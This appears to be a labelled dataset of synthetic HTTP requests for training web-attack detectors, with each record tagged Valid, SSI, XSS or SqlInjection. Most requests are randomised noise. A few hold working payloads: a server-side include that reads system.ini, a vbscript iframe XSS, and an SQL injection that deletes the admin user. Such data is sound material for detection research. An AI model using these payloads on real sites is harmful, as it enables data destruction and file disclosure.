End - Id: 41833
Start - Id: 6694
class: Valid
PUT /eoaparhy8csnutaa/al/ygdasrAnmk/lwynyF/0oraude0a/zscopyD7rLGILXTRyK/mX.niZI.vudv4@IgpK/saytsTsfstatcCl/7mtAElldp2ES6ks.php4? HTTP/1.1
Content-Length: 95
Content-Language: etsp0hi
Content-Encoding: deflate
Content-Location: http://s9hoqtwd.org/avti.php
Content-MD5: bGZzdGFzMGd3aXRlZmFhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Apr 04 04:43:43 UTC
Last-Modified: Mon, 15 Jun 09 20:54:18 UTC
Host: www.cceysnt.gov
Connection: close
Accept: */*
Accept-Charset: windows-1250;q=0.7, windows-874, x-mac-japanese, iso-2022-jp, windows-1258
Accept-Encoding: compress
Accept-Language: t-rEer;q=0.0, ywieeiy-f;q=0.1, ie-omrs57is, sfhnttto-JnQ;q=0.2, ce-voi
Cache-Control: max-stale
Client-ip: 155.113.169.156
Cookie: genlaatrt=aw4Rcaorcssritm;tyndansx=eitterrgroup bysnresm
Cookie2: $Version="214"
Date: Fri, 12 Sep 08 10:39:10 GMT
ETag: "aUAEYweAIy_FKSmYU"
Expect: odtyie
From: knj5rt@a7eaent9k.cz
If-Modified-Since: Sat, 12 Jun 04 23:58:08 UTC
If-Unmodified-Since: Sun, 23 Mar 08 22:40:13 UTC
If-Match: *
If-None-Match: "mW_JCHdJZBDfhqBJ"
If-Range: "rUZUr4ris5eAvrWhX"
Max-Forwards: 506
MIME-Version: 7.7
Pragma: dn=idno
Proxy-Authorization: Digest qop=auth
Authorization: Basic bW5nZXRycjpzZ3Vz
Range: -5629,33-
Referer: /tumin7ed/eas4Wp0/raxrq/eoanram/6shtsynr.cfm
TE: chunked,deflate;q=0.0,trailers
Trailer: Accept-Charset
User-Agent: 1-Vz-75 http://www.Hyceazb.uk
UA-CPU: x86
UA-Disp: 8391,040,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 075x397
Via: 3.1 208.91.116.167
Transfer-Encoding: gzip
Upgrade: hrutt/6.0, tbuzs/0.5, iar/0.3, u7e4ae/3.3
Warning: 827 www.Hnnarn.gif "6iaoe" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

re33oa3rttted=te&n6OM=05&cnpssXzs=94&el=ouaohleonw9vmeypE&pansiaec=7755&BMPpJW0v3H4v=66&s2=apeo

End - Id: 6694
Start - Id: 9926
class: Valid
GET /hdaEsriaoyewi5/scriptRsock_stream7Y8_C@rZ/hketazkdet1eWjAin1i/UWUw0/oBfA06.KbxFG-Jofvg0.jsp? HTTP/1.0
Host: 6.61.193.24
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: iso-8859-7, euc-cn;q=0.7, iso-2022-kr
Accept-Encoding: *;q=0.9
Accept-Language: e3-ec;q=0.9, iYre-n6teooda, ior64f-lutr9p;q=0.4, caOes4ta-5ust;q=0.3
Cache-Control: only-if-cached
Client-ip: 176.83.236.118
Cookie: unslDOOde=72455;ddo1eWph=nmetan1vtq;fApidI8=ep5o79RuKG;yE5n=4ccopy'ferr
Cookie2: $Version="2"
Date: Sat, 17 Jan 09 05:18:31 UTC
ETag: "vx4sXFZuE2ziptGDL"
Expect: m8dkgye
From: xGtn@mhhy.de
If-Modified-Since: Mon, 26 May 08 05:44:20 UTC
If-Unmodified-Since: Mon, 13 Aug 07 10:33:01 CET
If-Match: "1PG12tYqrxIIU2qZ8.b"
If-None-Match: "WT5CDYUjRD6ajY9C"
If-Range: "JBHvoS-sOVQRDLOZDsXB"
Max-Forwards: 00
MIME-Version: 3.5
Pragma: saa='eDcsxs'
Proxy-Authorization: Digest realm
Authorization: Basic cG5paWVkOnJob28=
Range: -073,-7284,0-
Referer: /7d0yPi/tscg/idnfu7e/yfg9l.txt
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.2 (compatible; Konqueror/5.4; Win98; dstlyeNyh)
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 496x973
Via: FTP/5.7 www.aelrir.jpg, noeEEY/5.6 241.245.101.35
Transfer-Encoding: gzip
Upgrade: dauz/8.3, e8tu/1.3, caH/0.7, Ass/4.7, enfo/0.0
Warning: 465 www.rewstm.jpeg "srthru38ehh" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 15113
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9926
Start - Id: 26696
class: Valid
GET /u2XhoDlS8.-V/gBR0V1HYzlD/ne3Aowpnhy6imzsa3r/lSetPw_CS5@u@F7KEp/eK9EQ-8Rp/Bceuotirc2hi7Alhvhr/5mpApntecho1ao/bgsoundPhpsR2lRVFR/1gDiolpixinofyljnlE7/aCwaFSlq.EALE-nraUE/ohVL3Z/eb7nezHPEu.jpg?RGWnt.5q=eb3to0rRf HTTP/1.0
Host: www.ornaQsbse.ch
Connection: keep-alive
Accept: image/gif, application/*;q=0.5, audio/x-wav;q=0.8
Accept-Charset: windows-1250, windows-1251, windows-1255, windows-1258, windows-1258;q=0.1
Accept-Encoding: gzip;q=0.1, identity;q=0.4, gzip;q=0.6, compress, compress
Accept-Language: X-d;q=0.2, zEat-KjhdmapC, hmb7a5eo-ne;q=0.8
Cache-Control: no-transform
Client-ip: 12.213.50.115
Cookie: crg6S_libFtHl=v9txtermhome tusdrradrop+ dstO;iaysN=il50h_fa-0
Cookie2: $Version="85"
Date: Mon, 28 May 07 01:15:14 CET
ETag: W/"XkIR4nAy-v9hGisM.2"
Expect: 100-continue
From: aenrotes@hoereselr.be
If-Modified-Since: Sun, 18 Sep 05 18:01:33 GMT
If-Unmodified-Since: Wed, 22 Dec 04 08:01:55 CET
If-Match: "NlRMtKFYqwJ0WmKRWXl"
If-None-Match: *
If-Range: *
Max-Forwards: 903
MIME-Version: 5.9
Pragma: tn='nlgft3v1'
Proxy-Authorization: WwHe eFalu=21hO7e
Authorization: Basic dFNyY2FlOmZuckF0dzY=
Range: 25-
Referer: /eta2s/utggkaa/entPeh/c8wg.jpeg
TE: trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/2.9 (X11; U; Linux i386 8.6; dd-Ii; rv:9.2.8) Gecko/68841756
UA-CPU: PowerPC
UA-Disp: 221,658,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 190x433
Via: 5.9 132.56.90.53:2, HTTP/4.5 42.234.99.141:1
Transfer-Encoding: identity
Upgrade: lWRqc/4.7, oaNoeA/8.1, SytTu/2.1, oaahe/2.1
Warning: 574 42.50.42.84 "esbdOnaSdh" 
X-Forwarded-For: 168.224.202.103
X-Serial-Number: 55910
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26696
Start - Id: 40569
class: SSI
GET /9ytio/gJVcOYYufPl/t_4t0/o13VWLS/acgotrncLwaia29othc.htm?3bangs=kohod+edsiunodeo&tzN1lctt=moEsr9eckeAk&mhes1napsuhnhD=%3C%21--+%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&jWAZe1nE=emmd&aemo8pOt=opent&VkBG1qiEV=93909837&esi=rd5zgroup+by&mHfei3fmhp=edg6a5brtlgeR%3E&erselgomcz=gssbecesUtrElosd&rpre=Caa9&nCzhtpass3nig6ZLconnect=2 HTTP/1.0
Host: www.aabnp.com
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-5, isiri-3342;q=0.9, iso-2022-jp, iso-8859-9, macintosh;q=0.6
Accept-Encoding: compress, deflate
Accept-Language: *;q=0.2
Cache-Control: max-stale=4209
Client-ip: 65.35.166.11
Cookie: oiundtTscmnet= v9no
Cookie2: $Version="84"
Date: Thu, 21 Feb 08 19:44:46 CET
ETag: "U.WS7WY8nuKS6LBUOBr5"
Expect: nnoh3ur=unoiiuae
From: ciHn@mdreeh.gov
If-Modified-Since: Sun, 10 Dec 06 17:24:05 UTC
If-Unmodified-Since: Sat, 08 Apr 06 01:55:41 CET
If-Match: "dEMvzW.D2QQLuE3ly"
If-None-Match: "m3XJCyfgckt14Mfk"
If-Range: Mon, 09 Jun 08 20:50:18 UTC
Max-Forwards: 53
Pragma: rm=e8ort
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest algorithm=MD5-sess
Range: -296381
Referer: http://ytsszn.st/ugkuNptc/w1ts/or8ne.aspx
TE: gzip;q=0.1
Trailer: Host
User-Agent: Mozilla/3.2 (compatible; MSIE 7.3; Linux i586; tnear)
UA-CPU: PowerPC
UA-Disp: 5809,4725,8
UA-OS: Win9x
UA-Pixels: 0455x286
Via: HTTP/3.8 225.169.108.156, 6.5 71.99.153.32, HTTP/8.0 48.188.73.98
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 93.136.204.39
X-Serial-Number: 56779
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40569
Start - Id: 12550
class: Valid
GET /TSFnt9e/Llpgwrnscaa6tctt/mx1a/dGdRYjKj7M0/aMOVyonGT@9x7q/OzZEiframeHHBQBS/_pUD/iheeotEdoDtcoo1os.gif?bYAAt9zolike=66030811&U5Jb=559093&he78asohOAnosny=rlelal&y7rqmouttad=agY&htmeeSt=gxnscriptnamatd&ldwdi=httplmR2dechola&pY=atdcimpOtthmsI&z-4u9ChmhS=rwuo&teotsexaxS=s&AnglipbOm7utiIc=nqzSVq&elaOtctClN2=m8o%5Dlogexecd%3Ao&7YlzZw1QHkN=%3F&bt5elITtotShike=ovRjTtAR&iedhceonts=ndhqwak4u&s1baoddf2adRahh=533 HTTP/1.1
Host: 236.83.84.99
Connection: close
Accept: text/*;q=0.9, video/*;q=0.8, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aetfaA-p3itTtIa, r-ranuyhd;q=0.6, k6iddwn-sjderugI
Cache-Control: epo8ihia='ucaO'
Client-ip: 91.12.121.99
Cookie: RfDIZ=+o;sw=e4-ed;U0kechobI=e;trkaln1eersez=144830
Cookie2: $Version="43"
Date: Mon, 19 Mar 07 02:31:19 UTC
ETag: W/"LLESttjpa6H.Gwziu"
Expect: rsrehz
From: Prazsf@rlxeoeonc.fr
If-Modified-Since: Sun, 16 Apr 06 01:00:34 UTC
If-Unmodified-Since: Sat, 06 Oct 07 24:13:06 GMT
If-Match: "PYs41pM64REUIFAm"
If-None-Match: "miCvBkOYFbVgNvzVxc"
If-Range: Sun, 02 Nov 08 16:27:10 UTC
Max-Forwards: 518
MIME-Version: 8.2
Pragma: emoor8u9=eiaenmh
Proxy-Authorization: NTLM ZW55dG12ZWdzaXRvbXc2MHhyZXV0aXhlaG5kZEdvdGlyOGF0RXRlc0V3b3Rp
Authorization: NTLM UmJFZXdzZXIzbW1uaWxjcnNlZU1tdDgzZTQ4YWltaGVuYXVlN0dyRg==
Range: 79521-822865,4-
Referer: http://mnne.cz/hocOn21/dshO/tadsd/937ell.js
TE: trailers,deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: Mozilla/5.7 (X11; U; Unix 3.0; gt-st; rv:7.3.5) Gecko/01499505
UA-CPU: PowerPC
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 366x415
Via: FTP/3.3 38.220.112.182, FTP/2.7 64.89.228.207:7
Transfer-Encoding: gzip
Upgrade: AGSes/3.1
Warning: 997 www.ce9up3.htm "ertyen49aeinh" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12550
Start - Id: 2199
class: Valid
GET /_49processing-instructionRaposition_BNKG%uP.png?Hi51snamt=669 HTTP/1.0
Host: 251.125.213.242
Connection: close
Accept: */*;q=0.6
Accept-Charset: utf-8, iso-8859-8-i;q=0.4, iso-10646-ucs-2;q=0.1, x-mac-japanese, x-mac-roman
Accept-Encoding: compress;q=0.6, compress, identity, identity;q=0.9
Accept-Language: qtrfnt-6asAnp3;q=0.2, erCz-rolszcdx;q=0.8, mowt-rsewuen;q=0.6
Cache-Control: no-store
Client-ip: 237.70.211.248
Cookie: mgts=604951;9eihspgfj=Ieokwmhel;Aixu0pt=p
Cookie2: $Version="0"
Date: Sat, 01 May 10 14:33:47 UTC
ETag: W/"LVkyU2uIMGdKMR918Ir0"
Expect: hnss
From: mennl@hhaoaw.st
If-Modified-Since: Sat, 23 Dec 06 04:58:20 UTC
If-Unmodified-Since: Fri, 23 Mar 07 19:30:50 UTC
If-Match: "wJHEcvi@@pW7ded.-mhe"
If-None-Match: *
If-Range: Tue, 09 Sep 08 22:57:16 GMT
Max-Forwards: 686
MIME-Version: 3.0
Pragma: ceSea='a'
Proxy-Authorization: Basic bmVGeGU6aThsZGc=
Authorization: Basic Y0RnZW86dGVEbGVpYWg=
Range: 646-76073,721917-1
Referer: /5horn/RnOairer/tesjg/fsehu3.conf
TE: trailers,chunked;q=0.8,deflate;q=0.6
Trailer: If-None-Match
User-Agent: mwhm/5.2.5.1.9
UA-CPU: Sparc
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 318x353
Via: 2.8 www.eme9Eoel.css
Transfer-Encoding: compress
Upgrade: ql7Ei/0.0
Warning: 212 www.eNeanmou.shtml "aaehpeix5satsyERQlt" "Mon, 21 Apr 08 17:05:16 CET"
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 26606464842114964
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2199
Start - Id: 47384
class: XSS
GET /pCHBuqw5@C0rK3s/1jkpUv@zv.vz/rgierNtl/K./tokRhll87LfII/tiiitecrDeoh/arcnttsneyanyeabE1t/Inadebcopy6/sAEu0c.zcOiM4.7RGCR1/FyxmlE.php3?nrthneps4rnmejl=126601352&tEyhRyiucyt=%3Ciframe+src+++%3D%22+++++vbscript%3A%5Balert+++%28%27sn%27%29%3B%5D++%22+++%3E&wFZN3NstdinLA_V.=776895&oxJl46lA9Uv=ay7nFiM HTTP/1.0
Host: 56.27.188.144
Connection: close
Accept: */*;q=0.1
Accept-Charset: hz-gb-2312, iso-10646-ucs-2, isiri-3342;q=0.5, windows-1258;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=950
Client-ip: 50.84.88.200
Cookie: lauo3srue20ril=tsetihes9eoasshhyc;p2tammEsotslfs=l
Cookie2: $Version="936"
Date: Sat, 05 Jul 08 07:28:46 GMT
ETag: W/"eK9JG65XxM2Bk-Ko"
Expect: 100-continue
From: dhMEe9le@RpqtlrdwLb.be
If-Modified-Since: Wed, 17 Aug 05 20:49:32 GMT
If-Unmodified-Since: Sun, 13 Feb 05 09:19:17 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7856
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Basic aXBucmM6ZXNhY3U=
Range: 35419-,75138-2674,165640-
Referer: /WrinYeko/lgmtl/hcanVae/abruf.zip
TE: trailers,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/3.8 (compatible; futeNhjut; Mac OS X; tmp8ro9)
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1670x058
Via: 0.0 240.221.188.123, HTTP/0.4 www.eYEtzha.jpg:8, 4.3 www.ivo4he.css
Transfer-Encoding: Dihyda
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 630 69.99.208.229 "aypepysetwq" "Mon, 12 Apr 04 06:01:50 CET"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 6529673477463
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47384
Start - Id: 5443
class: Valid
PUT /f.8M-QNiX@M/pfoe/eBaQIj.NvAKIH/a3et9dHeeep/79wWz5/Yaatgneatu/sEtevawh8edumc5lne/htd0teytoOirpl3/iBi2myY6sDCr.aspx? HTTP/1.0
Content-Length: 143
Content-Language: ry,dRaod
Content-Encoding: gzip
Content-Location: /fbtafrgo.swf
Content-MD5: ZWlIaHRBd21oVXRmZXV5NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Apr 10 22:26:42 GMT
Last-Modified: Sat, 06 May 06 07:47:48 GMT
Host: www.rjhs.cz:69
Connection: close
Accept: audio/x-wav, audio/*;q=0.0
Accept-Charset: windows-1251, x-mac-cyrillic, x-mac-ce, iso-8859-5, iso-8859-3
Accept-Encoding: 
Accept-Language: n-Tpmoeel;q=0.1, g-rtote;q=0.3, sdena-fiFoesnL, r-2, rEsoneep-lat
Cache-Control: only-if-cached
Client-ip: 89.82.1.51
Cookie: Ag0zLphpJ=7621;0mh7sn4reus4muf=efocsEimgHl2tehomeeer ;v8c22eit4reXteN=0050;jfpmocharhttp=9;sld=grablboapyF;uehsrwir=zn3R0aEnr
Cookie2: $Version="054"
Date: Sun, 19 Apr 09 14:51:46 UTC
ETag: "ED48w4tdoFd0A8P9w"
Expect: 100-continue
From: duemse@aiti.it
If-Modified-Since: Tue, 28 Aug 07 15:48:12 CET
If-Unmodified-Since: Wed, 13 Jul 05 15:09:58 CET
If-Match: "ercKWFyC73sZFhQ"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic SWF6OWNyOmNlZk50
Authorization: Basic dHNGeWh0OXM6Y0VlemE=
Range: 84-,-306723
Referer: /tevejiio/Nhox/xohs/Eezo6es.exe
TE: gzip,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.3 (Windows; U; WinNT 5.0; 1j-sf; rv:0.5.1) Gecko/12849707
UA-CPU: MIPS
UA-Disp: 0985,859,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 375x4615
Via: 1.5 229.63.157.164:34232
Transfer-Encoding: 9seto
Upgrade: 8saen/7.7
Warning: 577 170.128.203.218:7 "aog5pwhnote" 
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 20359821901
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4i2mww=hzKUB&ESntW= nea]oem r&l1oe=E&oarniFueqe=auu7eperloOiO&ncWeie=ax8zd1zhoK&oafxYss5=i&ii=919071276&Yetnessaenwi=7303290&Exegodiadce=ucte

End - Id: 5443
Start - Id: 13816
class: Valid
GET /cs4edswLaQr/iO6haaa/a0.htm? HTTP/1.0
Host: 133.99.169.124
Connection: close
Accept: audio/basic;q=0.8
Accept-Charset: us-ascii;q=0.5, x-mac-arabic;q=0.9, windows-1258, iso-8859-8-i;q=0.5, x-mac-arabic;q=0.0
Accept-Encoding: gzip, identity;q=0.3, compress;q=0.9
Accept-Language: pMa7-bme
Cache-Control: no-cache
Client-ip: 237.204.86.87
Cookie: o3xgrEe=oht;AbgsoundJC2aWz=EnefeqE1-;ke9honooohte=no0;ewwSEctpuv=asddAccnmsf9a;QLnt62so1cl=sm@Apimg)
Cookie2: $Version="3"
Date: Tue, 01 Sep 09 11:00:16 GMT
ETag: "GSILO7Th1taqOUKnQita"
Expect: ttoe=plrj5ar;nsee5cl=pmo7
From: dyZe1pi@teufdqetl.cz
If-Modified-Since: Mon, 21 Jun 04 01:02:00 CET
If-Unmodified-Since: Wed, 21 Jun 06 05:48:38 GMT
If-Match: *
If-None-Match: "OmGoWLUe-s3ZVHPBw8"
If-Range: "13vPSuvH2zYuy2gD"
Max-Forwards: 6
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ycrd"
Authorization: Basic c2NyZGluOm1hdHNra29k
Range: -658220,9-,-209
Referer: /qsr4i3/m5aest/drfrsavs.exe
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: 9ot0ea
UA-CPU: MIPS
UA-Disp: 1686,350,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 750x449
Via: 6.2 www.abjdri.png, HTTP/9.4 221.211.124.243
Transfer-Encoding: deflate
Upgrade: liu/3.9, ah1/5.7
Warning: 666 84.76.236.184 "t0uoITqzpy2Sloui" 
X-Forwarded-For: 166.8.232.165
X-Serial-Number: 4673699275390197026
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13816
Start - Id: 8616
class: Valid
GET /eBUeyqi.1q/LZ/dR/2SUOFjbWXj33zc6iN/ejtB/pDXZX1/iMbqHlKIj.zg0y.jpeg?gkentRnoe=n%28%3Cerin8meeoaynrm9%29child&allycgo=b&bhhbEsreCre=ogmsformm6&8uwherejzhM4=79213&pv4uriSRqei=e4oH%5Di&Ee0lNfaeeb9=638770&fMpj=cpsoorm2&25T_IMXxL=hloDvyt+%28&loleiewa=iedEcopy&cmar5Tio=418&qMo7qAlPzs=s8aPLr87x&ego6oih=xe5ht2&07Rh=Oumkrt HTTP/1.1
Host: www.nrus.org:848
Connection: n1mtea0y
Accept: application/*;q=0.7
Accept-Charset: iso-2022-jp, iso-8859-8;q=0.3, gb2312, macintosh;q=0.3, koi8-r
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 177.227.239.66
Cookie: rpEct=1e winnta
Cookie2: $Version="36"
Date: Sun, 10 May 09 18:58:51 GMT
ETag: W/"qonesKxnT5ujcYn42fP"
Expect: 100-continue
From: haEto@ynDonoH3ww.be
If-Modified-Since: Wed, 18 Apr 07 09:12:27 CET
If-Unmodified-Since: Thu, 02 Dec 04 24:55:18 CET
If-Match: "B86p215l.MpU1hd"
If-None-Match: "_nZe6zcWA9OHxHlJK"
If-Range: Thu, 06 May 04 15:10:05 GMT
Max-Forwards: 1630
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest response="51d1e171acafe5D1aaf5EF4b7BD78eDA"
Authorization: Basic aHd5cG1wMmE6NmZnaWU=
Range: 1-,565-51430,79330-
Referer: http://www.sjrnv8p.de/ierfDn/lIeqgi.gif
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/8.2 (Windows; U; WinNT 2.2; rs-ec; rv:5.6.9) Gecko/23144139
UA-CPU: 68000
UA-Disp: 490,2335,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 500x727
Via: sbsnbv/6.3 www.gj5ts.jpg:5, 8.9 186.141.211.182:18
Transfer-Encoding: compress
Upgrade: oAk/9.7, ylzLli/0.8, hne/4.9
Warning: 294 www.tpriIw.html "evdBEd" 
X-Forwarded-For: 240.127.253.85
X-Serial-Number: 1101244
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8616
Start - Id: 1371
class: Valid
GET /nccYt/hjjngy/Dwswipdhapncr/eN4_fX4T5otLONFmc_/ahPmrqRljUaTr4o/t571r@DG/hLDPVo-SEzq13Vy.jsp?hyZpPK9REZUM=08076078&nurethimw7e7=zdahp2noytrpxmt&iL6io4=IelEcoo4rkt&lcecileeiznp=18259&0Pp9NzXKincludeF=a++ag%27ceeento&ftss3ioatbben=f++a%3Bq+i+lrgrhziu%29&s2ccyUGhoi=930&aog=c8m5bZjAN15v&cRec1isie6rvrei=tnTEnl6zt&Z5Bprocessing-instructionbgsoundUk=1231&0gsamQu=bsrithwindow.openh8Entor&urereRak09uyei=plgchwaitex%3Eo&dn4bteitOher=eIUN75BZI&Egnqufl0j2=a&rvciuhies2mcaB=552732 HTTP/1.1
Host: 196.146.224.234
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, deflate, deflate;q=0.8
Accept-Language: htt-clp;q=0.6
Cache-Control: no-store
Client-ip: 85.112.24.2
Cookie: kyC9FautoexecY=566724611
Cookie2: $Version="7"
Date: Sat, 20 Aug 05 21:21:10 UTC
ETag: W/"NLDDHcD.qj9@50a1FAQw"
Expect: 100-continue
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Sun, 08 May 05 17:38:41 GMT
If-Unmodified-Since: Wed, 22 Mar 06 04:16:24 UTC
If-Match: *
If-None-Match: "vwtc9p6PnrCBigSGLc"
If-Range: Fri, 27 Apr 07 11:48:38 UTC
Max-Forwards: 5351
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWhnckVyenJ0ZWlvc2loRm82dHF0d0thaGRvVmxwYTFvZjJ4ZWxvZHVOaWc2aA==
Authorization: Digest cnonce="ihocn"
Range: 24-
Referer: /li8tOuo.jpeg
TE: gzip,trailers,chunked
Trailer: Date
User-Agent: oG5ZuN http://www.4i0dlo.biz
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 956x464
Via: FTP/7.8 www.dhfylW.js, FTP/3.2 www.kd9m.shtml, 0.8 27.240.228.50
Transfer-Encoding: compress
Upgrade: athehm/9.3, t3tmh/0.3, NPtic/1.9, tch/6.4
Warning: 857 www.Snpe.htm "qdO3unnssateraarij" 
X-Forwarded-For: 188.179.244.100
X-Serial-Number: 147844
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1371
Start - Id: 41951
class: SqlInjection
GET /a3sThsr3miGsilzynf.pl?mYphhfosit=yiawxn%27++++%29%3B++DELETE+++FROM++++users++++WHERE+++upper%28username%29+++++%3D++++upper%28%27admin HTTP/1.0
Host: www.Mbbd0mVixe.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 152.104.66.182
Cookie: oeftrraa=e7aa2;aei=lsnL;afa5iraNdeulnf=jjw9husP;KWOZPservicesZ=pT0F73FvQo;etrtAefgetieZta=091065
Cookie2: $Version="26"
Date: Wed, 04 Jun 08 24:33:14 CET
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: w9indwk=ssrsuoT
From: 7n10udti@ds4gh.org
If-Modified-Since: Fri, 17 Apr 09 02:17:04 GMT
If-Unmodified-Since: Sun, 03 Jan 10 23:00:03 CET
If-Match: *
If-None-Match: "5ZlG8oNFpAZ5Ob3hF"
If-Range: Tue, 09 Nov 04 07:09:35 UTC
Max-Forwards: 9151
MIME-Version: 6.3
Pragma: taunjemm='O'
Proxy-Authorization: Basic MW5lYW1OdG46YXN0bHRlbnI=
Authorization: Digest username="aEmaxdo"
Range: 55660-
Referer: http://www.iaTeaeha.fr/aEah/t1ixtR/NazDfd/arttaWc8.exe
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.1 (compatible; MSIE 6.2; Unix; waan5t; Wdnsc24nh; rtphha)
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: deflate
Upgrade: ep1Mri/9.9, tcn/2.5, elb8/5.8, eeNie/7.6
Warning: 346 34.138.57.132 "dh7piowEhlanirTtsTh6" 
X-Forwarded-For: 116.82.96.232
X-Serial-Number: 41242078999326437
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41951
Start - Id: 10236
class: Valid
GET /hU1.2o@rrSIB.tiff?neuQnnul3ENe=2805765&5TYeMNQid=4096121&0Ezs=177&5ine4tor=em8iwsHMscaanar&oye5otjtto=nT+lho%27De%5Dee%3BAbinen&vbscript5xb5.@f=a7_G- HTTP/1.0
Host: 169.214.139.159:80
Connection: nlf6
Accept: text/*;q=0.0, video/*, text/plain;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: ok='BaSe'
Client-ip: 242.45.255.170
Cookie: wt1e=840286073;nsue=Qs
Cookie2: $Version="33"
Date: Fri, 03 Mar 06 09:42:11 CET
ETag: "qgju1@024ThVVnrUmM"
Expect: 100-continue
From: 8ats@arc0sedxjc.net
If-Modified-Since: Sat, 10 Jan 04 11:59:46 GMT
If-Unmodified-Since: Fri, 22 Aug 08 21:33:39 UTC
If-Match: "cm7Li36t4bJ.3XW"
If-None-Match: *
If-Range: Tue, 09 Jun 09 03:12:58 UTC
Max-Forwards: 51
MIME-Version: 2.0
Pragma: aysP7h=eaeflbe
Proxy-Authorization: Digest response="09D35458eFFCF6eeB6ECbdFBEAdD11C5"
Authorization: NTLM dDlicDJpdG5nZWZzN3JCZWVmenB0NG4zbmhBanNlaWNm
Range: 48806-,859-40,-983
Referer: http://www.o8aR.fr/irerjt/maaUppnh/1eir9e9e.asmx
TE: chunked,gzip,deflate
Trailer: Via
User-Agent: imm1MmMW http://www.Tiuty.st
UA-CPU: PowerPC
UA-Disp: 118,0565,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x474
Via: FTP/8.0 49.62.243.93:0, 2.5 www.n6a5if.tiff:3182
Transfer-Encoding: deflate
Upgrade: e34/2.8, srytrj/3.4, igIE5/7.9, eidtoe/3.9, xiv8g/0.2
Warning: 543 www.ocsh.htm "tc9yeg9eae" 
X-Forwarded-For: 210.213.192.34
X-Serial-Number: 56021671448691274221
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10236
Start - Id: 30761
class: Valid
